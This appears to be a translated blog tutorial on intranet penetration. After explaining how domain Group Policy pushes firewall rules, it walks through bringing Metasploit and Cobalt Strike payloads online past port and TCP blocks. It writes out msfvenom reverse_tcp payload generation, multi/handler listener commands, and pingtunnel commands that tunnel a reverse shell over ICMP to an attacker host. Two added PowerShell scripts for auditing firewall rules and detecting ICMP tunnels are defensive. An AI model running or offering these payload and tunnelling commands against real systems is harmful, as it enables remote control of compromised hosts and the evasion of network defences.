
Intranet penetration: synchronizing domain firewall policy, and bringing a beacon online when the host has no outbound network access

1. Preamble

  In the previous chapter on domain information collection we got a general picture of what can be gathered about a domain; good information collection goes a long way toward reaching the goal we want. When we carry out intranet penetration we have usually already obtained some level of access through a web file upload, command execution or a similar operation. Having obtained that access we want to do more, and at that point we may run into a domain. In a domain our ultimate goal is domain controller privileges; once we have those, the goal is reached. If there is no domain in the intranet, things are simpler.

  This chapter mainly covers domain firewalls: what to do when we run into a domain in which the firewall has been turned on.

2. Domain Firewall

  Configuring the firewall uniformly with domain Group Policy or scripts

  Most enterprise intranets today are domain environments, and some enterprise applications require the client to open a specific port or allow ping. In a large environment, configuring thousands of clients one by one is inefficient and inflexible.

  Here we briefly walk through a test of using the domain controller to synchronize the firewall policy across the whole network.

  Hosts in a domain usually have the firewall turned on, and the firewall state and rules are managed from the domain controller; put simply, the administrator controls them, and a user inside the intranet has no right to create rules. If an intranet user needs something, the domain administrator can create the corresponding inbound and outbound rules for that host, and can of course also push them to every host. So during intranet penetration, running into a domain controller whose hosts also have the firewall on is a real headache.

2.1. Testing firewall synchronization from the domain controller

  First we need to prepare a domain controller and a domain member host for the demonstration. We start by checking whether the host is in a domain environment; this was already covered in the previous chapter, so the command and its output are not explained again here.

[Screenshot: checking that the host is a domain member]

2.1.1. View the Domain Host Firewall Policy

  First we look at the current firewall policy on the domain host, so that after the domain controller delivers the policy we can tell whether synchronization succeeded. As the screenshot shows, all profiles are currently enabled.

[Screenshot: domain host firewall profiles, all enabled]

2.1.2. Delivering and synchronizing the firewall policy from the domain controller

  Here the firewall policy is configured on the domain controller so that hosts in the domain synchronize it.

2.1.2.1. Create Group Policy

  In this example we use the domain controller to deliver the firewall policy.

  Start > Administrative Tools > Group Policy Management > Forest > Domains > right-click the domain > Create a GPO in this domain > set the name

[Screenshots: creating the GPO in Group Policy Management]

2.1.2.2. Edit Group Policy

  Now the Group Policy can be edited: right-click the GPO and choose "Edit" to open the editor window.

[Screenshot: Group Policy Management Editor]

2.1.2.3. Edit the firewall

  Computer Configuration > Policies > Windows Settings > Security Settings > Windows Firewall with Advanced Security > Windows Firewall Properties > Domain Profile / Private Profile (Firewall state: Off) / Public Profile (Firewall state: Off) > Apply

[Screenshot: Windows Firewall Properties in the GPO]

2.1.2.4. Synchronize firewall policy

  About synchronizing the firewall policy here: I found that clicking "force" directly did not seem to have any effect, and running the update command seemed a bit problematic as well, but after a restart the policy was synchronized normally.

  Official explanation: Group Policy is automatically refreshed when a domain member computer is restarted or when a user logs on to a domain member computer. In addition, Group Policy is refreshed periodically. By default, this periodic refresh is performed every 90 minutes, with a random offset of no more than 30 minutes.

gpupdate   ## refresh Group Policy
[Screenshot: domain host firewall profiles after the policy was synchronized]

2.2. Synchronizing inbound and outbound rules from the domain controller

  In some domains the firewall is turned off, but the administrator still pushes rules from the domain controller, for example allowing only one host to reach port 3389 on the domain controller, or delivering different policies for different applications.

2.2.1. View domain host inbound and outbound rules

  First we look at the outbound and inbound rules on the domain host, so that we can tell whether the later steps succeed.

2.2.1.1. Outbound Rules

  On the domain host, open Administrative Tools > Windows Firewall with Advanced Security > Outbound Rules.

[Screenshot: domain host outbound rules]

2.2.1.2. Inbound Rules

  On the domain host, open Administrative Tools > Windows Firewall with Advanced Security > Inbound Rules.

[Screenshot: domain host inbound rules]

2.2.2. Delivering outbound rules from the domain controller

  Back in the GPO we just created on the domain controller, open Windows Firewall with Advanced Security and look at the inbound and outbound rules; by default there are none.

[Screenshot: empty inbound and outbound rules in the GPO]

2.2.2.1. Access to Baidu

  We are going to create a rule that blocks access to Baidu, so first we check whether Baidu is reachable at the moment. As the screenshot shows, it is.

[Screenshot: Baidu reachable from the domain host]

2.2.2.2. Setting the rule on the domain controller

  At this point we need to understand what an inbound rule and an outbound rule are. Put simply, when you connect out to someone else's service, that is outbound; when someone connects to a service you provide, that is inbound.

  Here I simply set it to block all TCP ports. I won't go into the specific settings; there is plenty about this on Baidu, and it is easy to follow.

  On the domain controller: Group Policy > Windows Firewall with Advanced Security > Outbound Rules

[Screenshot: outbound block rule for TCP in the GPO]

2.2.2.3. Synchronization Policy

  Once the rule has been added on the domain controller it can be synchronized on the domain host, again with the update command and a restart. Then we open Administrative Tools > Windows Firewall with Advanced Security > Outbound Rules on the host.

[Screenshot: the GPO outbound rule now present on the domain host]
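To verify on the domain member what the Group Policy refresh in 2.1.2.4 and the synchronization step above actually delivered, here is an added PowerShell audit script; it is not from the original post. It assumes the built-in NetSecurity module (Windows 8 / Server 2012 or later) and an elevated session on the domain host; whatever rule and GPO names it prints are those the domain set.

```powershell
# Added example (not part of the original post): show the firewall policy a
# domain member is actually enforcing after Group Policy has refreshed.
# Assumes the built-in NetSecurity module (Windows 8 / Server 2012 or later)
# and an elevated session on the domain host.

function Get-EffectiveFirewallReport {
    # Profile state as applied right now. ActiveStore is the merge of the local
    # policy and every GPO that reached this host, so it is what really counts.
    $profiles = Get-NetFirewallProfile -PolicyStore ActiveStore |
        Select-Object Name, Enabled, DefaultInboundAction, DefaultOutboundAction

    # Rules that arrived through Group Policy only. The RSOP store holds the
    # resultant GPO rules, and PolicyStoreSource names the GPO that pushed each.
    $rules = foreach ($rule in Get-NetFirewallRule -PolicyStore RSOP) {
        $port = $rule | Get-NetFirewallPortFilter
        [PSCustomObject]@{
            Name       = $rule.DisplayName
            Direction  = [string]$rule.Direction
            Action     = [string]$rule.Action
            Enabled    = [string]$rule.Enabled
            Protocol   = $port.Protocol
            LocalPort  = ($port.LocalPort  -join ',')
            RemotePort = ($port.RemotePort -join ',')
            SourceGPO  = $rule.PolicyStoreSource
        }
    }

    [PSCustomObject]@{ Profiles = $profiles; GpoRules = @($rules) }
}

$report = Get-EffectiveFirewallReport

"== Firewall profiles (effective) =="
$report.Profiles | Format-Table -AutoSize

"== Rules delivered by Group Policy =="
$report.GpoRules | Format-Table -AutoSize

# Broad outbound block rules are the ones that stop a beacon's callback (the
# post later builds a TCP 1000-65535 rule of this kind). Call them out explicitly.
"== Outbound block rules from GPO =="
$report.GpoRules |
    Where-Object { $_.Direction -eq 'Outbound' -and $_.Action -eq 'Block' } |
    ForEach-Object { "{0}: {1} remote port(s) {2}  [{3}]" -f $_.Name, $_.Protocol, $_.RemotePort, $_.SourceGPO }

# Cross-check which GPOs the computer actually applied. If the firewall GPO is
# missing here, force a refresh (gpupdate /target:computer /force) or reboot.
gpresult /r /scope:computer
```

The point of reading the RSOP store rather than the local persistent store is that it separates what the domain pushed from what was configured locally; if a rule you expect is absent from the RSOP listing but `gpresult` shows the GPO as applied, the problem is in the GPO itself rather than in the refresh.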

2.2.2.4. Test access to Baidu

  As the screenshot shows, Baidu is no longer reachable.

[Screenshot: Baidu no longer reachable after the outbound rule was applied]

2.2.3. Delivering inbound rules from the domain controller

  I won't test this here; related tests come later. It is essentially the same as the outbound setup, but you have to keep the direction of outbound and inbound straight.

3. Stand-alone test

  This section mainly tests some restrictions that may be encountered in an intranet and how to get our Trojans online despite them. Of course this chapter only covers part of the topic; there is a lot of material in this area, and it is impossible to finish it in one chapter.

  Here we use MSF Trojans for testing.

3.1. Protocol Reference

  Note that the protocols build on each other: for example, if the TCP protocol is blocked, do you think the HTTP protocol can still be used?

[Screenshot: protocol reference]

3.2. Common Bypasses

  In fact there are many situations here, and I may not be able to test them all, so let's first list the various kinds of blocking that may exist and the corresponding solutions. One more point to note: if the policy is really strict, it may genuinely be impossible to break, for example when only the allowed ports and only the allowed protocols can be used; unless you can go through a third-party software vulnerability, or get the domain controller directly, it may really be impossible to get out. Of course, this is my personal understanding, and the experts surely have other tricks.

1. Port restrictions come in three kinds: inbound ports restricted, outbound ports restricted, or both restricted.
		Inbound ports restricted, outbound ports not restricted: use a reverse connection.
		Outbound ports restricted, inbound ports not restricted: use a forward (bind) connection.
		Both inbound and outbound ports restricted: connect through a port that bypasses the restriction, preferably combined with a reverse connection.
		
2. Protocol restrictions are likewise inbound, outbound, or both, and each of these is further divided into single-protocol, multi-protocol, and all-protocol restrictions.
		Inbound restrictions:
			Single protocol restricted: bypass with another protocol or a reverse connection.
			Multiple protocols restricted: bypass with an unrestricted protocol or a reverse connection.
			All protocols restricted: give up, or bypass with a reverse connection; normally not every protocol is blocked.
		Outbound restrictions:
			As above, but bypass with a forward connection.
		Both inbound and outbound restricted:
			Single protocol restricted: bypass with another protocol.
			Multiple protocols restricted: bypass with an unrestricted protocol.
			All protocols restricted: give up; normally not every protocol is blocked.

3.3. Coming online under port restrictions

  In some cases the administrator closes unused ports, or whitelists some ports so that authorized software can communicate. Here we test port restrictions. Since the test environment was built by ourselves, the real world will differ in places, so treat this as a reference only.

  For the bypass methods that are not demonstrated, refer to 3.2 Common bypasses and work through them yourself; otherwise this would get far too long.

3.3.1. Set outbound port rules

  I won't go into the process of creating the rule here. The setup is as follows: our Trojan uses port 5555, and the host is forbidden from communicating externally on ports 1000-65535, so we can switch to a different port to communicate.

  As the screenshot shows, we have created a rule that blocks external communication on TCP ports 1000-65535.

[Screenshot: outbound rule blocking TCP ports 1000-65535]

3.3.2. MSF generates Trojans

  Here we use MSF to generate the Trojan.

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.10.20 LPORT=5555 -f exe > msf.exe
[Screenshot: msfvenom output]

3.3.3. Starting the MSF listener

msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.10.20
set LPORT 5555
run
[Screenshot: multi/handler listening on port 5555]

3.3.4. Upload and run the Trojan

  If anyone asks how the Trojan is uploaded, I don't know how to explain it to you.

[Screenshot: Trojan uploaded to the domain host]

3.3.5. Check Status

  You can see that after the Trojan is executed no connection is established, which proves that the block works. The fix is simple: switch to a different port to come online; here I switch to port 999.

[Screenshot: no session established on port 5555]

3.3.6. State after port replacement

  Here you can see that after switching the port the beacon comes online successfully. Some may feel this is very simple, but in practice it will rarely be a plain port block that can be bypassed this way; it is much more likely that the protocol is blocked.

[Screenshot: session established after switching to port 999]

3.4. Coming online under protocol restrictions

  The bypass ideas for protocol restrictions were written above. I wanted to give an example, but I have gone through a lot of documents and none covered how to generate other kinds of Trojans; in short, I am still too much of a beginner. Many Trojans are still based on TCP connections, and as mentioned before, when TCP is blocked, related protocols such as HTTP and HTTPS cannot be used either.

  However, one of the operations below does show that when TCP is blocked, ICMP can be used to connect. Blocking TCP only stops TCP from connecting to the outside, so the traffic can be forwarded over ICMP instead.

4. Domain Policy Testing

  This domain policy test mainly covers how to get online when the host has no network access, and what to do when the host has network access but cannot get online because of domain policy restrictions.

  If inbound is blocked, the ideas below can be reversed accordingly; more specific ideas will follow in later chapters.

1. Host outbound TCP blocked, inbound not blocked, but no Internet access
	Bypass idea:
		Use a forward connection. This needs a host in the domain that can reach the Internet and can also communicate with the target host; that host then relays the target host's traffic and is used to control it.

2. Host outbound TCP blocked, inbound not blocked, with Internet access
	Bypass idea:
		There are two ways: the one described above, or tunneling, which carries the traffic over another protocol.

4.1. Background

  The domain controller has used a policy to synchronize the firewall rules of the hosts in the domain: outbound TCP from those hosts is blocked, configured as outbound rules. During the penetration test a shell has already been obtained by other means, and we need to continue operating.

  This background corresponds to the second case above. We can use a forward connection or tunneling; forward connections are left for later, so let's talk about tunneling first.

4.1.1. Introduction to tunneling technology

  In real networks, traffic is usually inspected by various border devices, software and hardware firewalls, IPS, IDS, situational awareness platforms and so on, and if the firewall detects an anomaly it blocks it automatically. For example, if the firewall is configured so that host A may not access host B, then when host A tries to reach host B the firewall intercepts it, and they cannot communicate.

  In the background above, the firewall blocks TCP so that the host cannot reach the Internet, which stops our Trojan from coming online during the penetration test. If ICMP is not restricted, the packets can be encapsulated in ICMP to pass through the firewall; when they reach the destination they are unpacked, and the restored packets are delivered to the corresponding server.

4.2. MSF online case without outbound network access

  This is the no-outbound-network case. ICMP is generally not blocked, because ping needs ICMP and ping is the easiest way to test connectivity, so it is usually left open.

4.2.1. Tool Preparation

  Here we need to convert TCP traffic into ICMP, so we need a tool. Three ICMP projects are listed below; this experiment uses pingtunnel.

  SPP:https://gitcode.com/esrrhs/spp?utm_source=csdn_github_accelerator&isLogin=1

icmpsh:https://gitcode.com/bdamele/icmpsh?utm_source=csdn_github_accelerator&isLogin=1

pingtunnel:https://gitcode.com/esrrhs/pingtunnel?utm_source=csdn_github_accelerator&isLogin=1

4.2.1.1. Download server

  First we download the server side, the Linux build, because both the CS and the MSF side need to run on Linux, so Linux is more convenient.

  Note that the download itself is very simple, but the project description does not directly say which binary is the server and which is the client, so I was a bit lost. I consulted a lot of material, all of which just says how to use it, and some tools share the same name but are not this tool, which did not help either, so I downloaded them one by one to test...

  After downloading, it is a ZIP archive. We unzip it and upload the file to the Linux system. Although I say Linux, you can probably guess it is actually Kali.

[Screenshot: pingtunnel server binary on the Linux host]

4.2.1.2. Run the server

  Running the server here is mainly to check that it starts normally; it must be run with the highest privilege.

sudo ./pingtunnel -type server
[Screenshot: pingtunnel server running]

4.2.1.3. Download the client

  Since the forwarding happens on a Windows system, we download the Windows build for the client.

[Screenshot: pingtunnel Windows client download]

4.2.1.4. Upload client

  We unzip the downloaded client and upload it to the target host.

4.2.2. Preparation

  The simulation follows the background introduced above.

4.2.2.1. Target host situation

  Note: if the simulation environment you built cannot reach Baidu and ping fails as well, turn on the DC; the domain controller virtual machine must be running too.

  You can see that there is a rule named "baidu" in the target host's outbound rules, which blocks outbound TCP traffic. Under normal circumstances, uploading the Trojan directly will not bring it online, because the Trojan uses a TCP connection.

[Screenshot: the "baidu" outbound rule on the target host]

  Testing Baidu again, we can ping Baidu but cannot access it; that is because ping uses ICMP, while accessing Baidu uses TCP.

[Screenshot: ping to Baidu succeeds, web access fails]

4.2.2.2. Attacker machine situation

  Here we can turn on the listener.

[Screenshot: listener started on the attacker machine]

4.2.3. MSF Settings

  There are several points to pay attention to here. Previously we used MSF to generate a Trojan that connects back directly: whatever the attacker machine's IP was, that was the IP written into the Trojan. Here it is different, as explained below.

4.2.3.1. Distinction introduction

  You may notice that the Trojan generated here connects to 127.0.0.1. This is needed to work together with the TCP-to-ICMP tool. The commands are below, and I explain them one by one:

  MSF Trojan generation: since TCP on the target host is blocked, if we still wrote the attacker machine's IP into the Trojan, the connection would be intercepted as soon as the Trojan ran, and the Trojan would fail. If the Trojan connects to a local address instead, it is not blocked; the traffic stays local, but this at least guarantees that the Trojan keeps running.

  Tool forwarding command: the tool first wraps the Trojan's traffic to 127.0.0.1:5555 into ICMP, then forwards it to 192.168.10.20:6666, where 192.168.10.20 is our attacker machine. This completes the whole encapsulation and forwarding chain.

  As for the port we listen on: previously we listened on the same port the Trojan connected back to, but now we listen on the port the tool forwards to, that is, 6666.

Generate the MSF Trojan:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=5555 -f exe > msf.exe

Tool forwarding command:
pingtunnel.exe -type client -l 127.0.0.1:5555 -s 192.168.10.20 -t 192.168.10.20:6666 -tcp 1 -noprint 1 -nolog 1

4.2.3.2. Generate Trojans

  The command for generating the Trojan is above, so it is not repeated here; after generating it, upload the Trojan to the target machine.

[Screenshot: Trojan generated and uploaded]

4.2.3.3. Set listener

  In this case the listener's IP address must be set to 0.0.0.0 so that it accepts the forwarded connection.

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 6666
run
[Screenshot: multi/handler listening on 0.0.0.0:6666]

4.2.4. Formal Testing

  The preparations are now complete, so let's start the actual test.

4.2.4.1. Target Host Testing

  On the target host we run the tool and then the Trojan. The main thing is that the tool must run with the highest privilege; in short, once you have a host in the domain you need to escalate privileges first, and only then forward.

  I found that if the Trojan is executed first and the tool afterwards, MSF does not come online; the tool has to be run first, and then the Trojan.

pingtunnel.exe -type client -l 127.0.0.1:5555 -s 192.168.10.20 -t 192.168.10.20:6666 -tcp 1 -noprint 1 -nolog 1
[Screenshot: pingtunnel client running on the target host]

4.2.4.2. Check the forwarding traffic

  You can see a large amount of forwarded traffic here.

[Screenshot: forwarded traffic on the pingtunnel server]
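The "large amount of forwarded traffic" visible above, and the encapsulation described in 4.1.1, are also what a defender would look for. The following PowerShell script is an added example, not from the original post: it reads Windows Firewall log lines in the pfirewall.log "#Fields:" layout and scores ICMP echo requests per source/destination pair by rate and payload size, which separates a tunnel from ordinary ping. The log lines are constructed sample data, and the thresholds are assumptions to be tuned per environment.

```powershell
# Added example (not part of the original post): flag ICMP echo traffic in a
# Windows Firewall log that looks like a tunnel rather than diagnostic ping.
# The log below is constructed sample data in the pfirewall.log "#Fields:"
# layout; real logs live at %SystemRoot%\System32\LogFiles\Firewall\pfirewall.log
# and need the profile's "Log successful connections" setting turned on.
# Thresholds in Test-IcmpTunnelSuspect are assumptions to tune per environment.

$sampleLog = @'
#Version: 1.5
#Software: Microsoft Windows Firewall
#Time Format: Local
#Fields: date time action protocol src-ip dst-ip src-port dst-port size tcpflags tcpsyn tcpack tcpwin icmptype icmpcode info path
2024-05-01 10:00:01 ALLOW ICMP 192.168.10.30 192.168.10.20 - - 60 - - - - 8 0 - SEND
2024-05-01 10:00:02 ALLOW ICMP 192.168.10.30 192.168.10.20 - - 60 - - - - 8 0 - SEND
2024-05-01 10:00:03 ALLOW ICMP 192.168.10.30 192.168.10.20 - - 60 - - - - 8 0 - SEND
2024-05-01 10:00:04 ALLOW ICMP 192.168.10.30 192.168.10.20 - - 60 - - - - 8 0 - SEND
2024-05-01 10:00:04 ALLOW ICMP 192.168.10.20 192.168.10.30 - - 60 - - - - 0 0 - RECEIVE
2024-05-01 10:05:10 ALLOW ICMP 192.168.10.31 192.168.10.20 - - 1480 - - - - 8 0 - SEND
2024-05-01 10:05:10 ALLOW ICMP 192.168.10.31 192.168.10.20 - - 204 - - - - 8 0 - SEND
2024-05-01 10:05:10 ALLOW ICMP 192.168.10.31 192.168.10.20 - - 1480 - - - - 8 0 - SEND
2024-05-01 10:05:10 ALLOW ICMP 192.168.10.31 192.168.10.20 - - 88 - - - - 8 0 - SEND
2024-05-01 10:05:11 ALLOW ICMP 192.168.10.31 192.168.10.20 - - 1480 - - - - 8 0 - SEND
2024-05-01 10:05:11 ALLOW ICMP 192.168.10.31 192.168.10.20 - - 980 - - - - 8 0 - SEND
2024-05-01 10:05:11 ALLOW ICMP 192.168.10.31 192.168.10.20 - - 1480 - - - - 8 0 - SEND
2024-05-01 10:05:11 ALLOW ICMP 192.168.10.31 192.168.10.20 - - 1480 - - - - 8 0 - SEND
'@

function Get-IcmpEchoStats {
    param([string[]]$Lines)
    $culture = [System.Globalization.CultureInfo]::InvariantCulture
    # Keep only ICMP echo requests (icmptype 8); field positions follow "#Fields:".
    $echoes = foreach ($line in $Lines) {
        if ($line -match '^#' -or [string]::IsNullOrWhiteSpace($line)) { continue }
        $f = $line.Trim() -split '\s+'
        if ($f.Count -lt 17 -or $f[3] -ne 'ICMP' -or $f[13] -ne '8') { continue }
        [PSCustomObject]@{
            Time = [datetime]::ParseExact("$($f[0]) $($f[1])", 'yyyy-MM-dd HH:mm:ss', $culture)
            Src  = $f[4]
            Dst  = $f[5]
            Size = [int]$f[8]
        }
    }
    # One summary row per source/destination pair.
    foreach ($g in ($echoes | Group-Object Src, Dst)) {
        $times   = @($g.Group.Time | Sort-Object)
        $sizes   = @($g.Group.Size)
        $seconds = [math]::Max(1, ($times[-1] - $times[0]).TotalSeconds)
        [PSCustomObject]@{
            Src           = $g.Group[0].Src
            Dst           = $g.Group[0].Dst
            Requests      = $g.Count
            PerSecond     = [math]::Round($g.Count / $seconds, 2)
            AvgSize       = [math]::Round(($sizes | Measure-Object -Average).Average)
            DistinctSizes = @($sizes | Sort-Object -Unique).Count
        }
    }
}

function Test-IcmpTunnelSuspect {
    param($Stat)
    # Windows ping sends one 60-byte echo (20 IP + 8 ICMP + 32 payload) per
    # second at a constant size; a tunnel sends bursts of large, varying packets.
    ($Stat.PerSecond -gt 3) -or ($Stat.AvgSize -gt 200) -or ($Stat.DistinctSizes -gt 2)
}

$stats = Get-IcmpEchoStats -Lines ($sampleLog -split "`r?`n")
"== ICMP echo summary =="
$stats | Format-Table -AutoSize
"== Suspected ICMP tunnels =="
$stats | Where-Object { Test-IcmpTunnelSuspect $_ } |
    Format-Table Src, Dst, Requests, PerSecond, AvgSize, DistinctSizes -AutoSize
```

On the sample data, 192.168.10.30 (four 60-byte echoes over three seconds) is reported as normal ping, while 192.168.10.31 (eight echoes within one second, average size over 1000 bytes, several distinct sizes) is flagged. The same GPO mechanism from section 2 can also close the channel itself: an outbound rule for protocol ICMPv4, ICMP type 8, that allows echo only to the monitoring hosts that genuinely need it removes the assumption the post relies on, namely that ping is always left open.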

4.2.4.3. Check the online status

  I found, for reasons I don't know, that the Trojan seems to run a little unstably and drops easily, but it does come online normally.

[Screenshot: Meterpreter session established through the ICMP tunnel]

4.3. CS online case without outbound network access

  I won't say much about the preliminary preparation here; the preparation and tool setup are the same as before, so let's set up CS directly.

4.3.1. Set CS listener

  As analyzed above, we set up two listeners: one for generating the Trojan and one for receiving the callback.

4.3.1.1. Listener 1

  Here you need to set all IP addresses to 127.0.0.1.

[Screenshot: CS listener 1 with all addresses set to 127.0.0.1]

4.3.1.2. Listener 2

  This listener receives the traffic the tool forwards back, so it must listen locally on the attacker machine.

[Screenshot: CS listener 2]

4.3.2. Generating Trojans

  At this point, you can generate a Trojan and upload it to the target host.

4.3.2.1. Generate stageless Trojans

  About stageless:

  Stageless can be understood as the stager and the stage it would request combined into one payload. Stageless is safer than a stager, but it is larger. Moreover, in intranet penetration you can basically only use stageless; using a stager is very troublesome, because a stager transmits the payload in stages, and that sometimes causes the target to fail to come online. The only drawback of stageless is that it is comparatively large.

[Screenshot: generating a stageless payload in CS]

4.3.2.2. Set the listener

  To set the listener here, you must select Listener 1.

[Screenshot: Listener 1 selected for the payload]

4.3.3. Formal Testing

  With the above in place we can test properly. First check that the environment has not changed: it should still be possible only to ping Baidu, not to access it. Testing confirms this is still the case.

[Screenshot: ping to Baidu succeeds, web access still fails]

4.3.3.1. Target Host Testing

  As with MSF, we run the tool first and then the Trojan.

pingtunnel.exe -type client -l 127.0.0.1:5555 -s 192.168.10.20 -t 192.168.10.20:6666 -tcp 1 -noprint 1 -nolog 1
[Screenshot: pingtunnel client running on the target host]

4.3.3.2. Check the forwarding status

  You can see that the forwarding was successful.

[Screenshot: forwarding succeeded on the pingtunnel server]

4.3.3.3. Check the online status

  Here too we can see that the beacon came online successfully.

[Screenshot: CS beacon online through the ICMP tunnel]

5. Summary

  There are many more bypass methods in a domain, but it is impossible to write them all down, my level is limited, and I am still learning; there will be a lot more intranet content in the future.
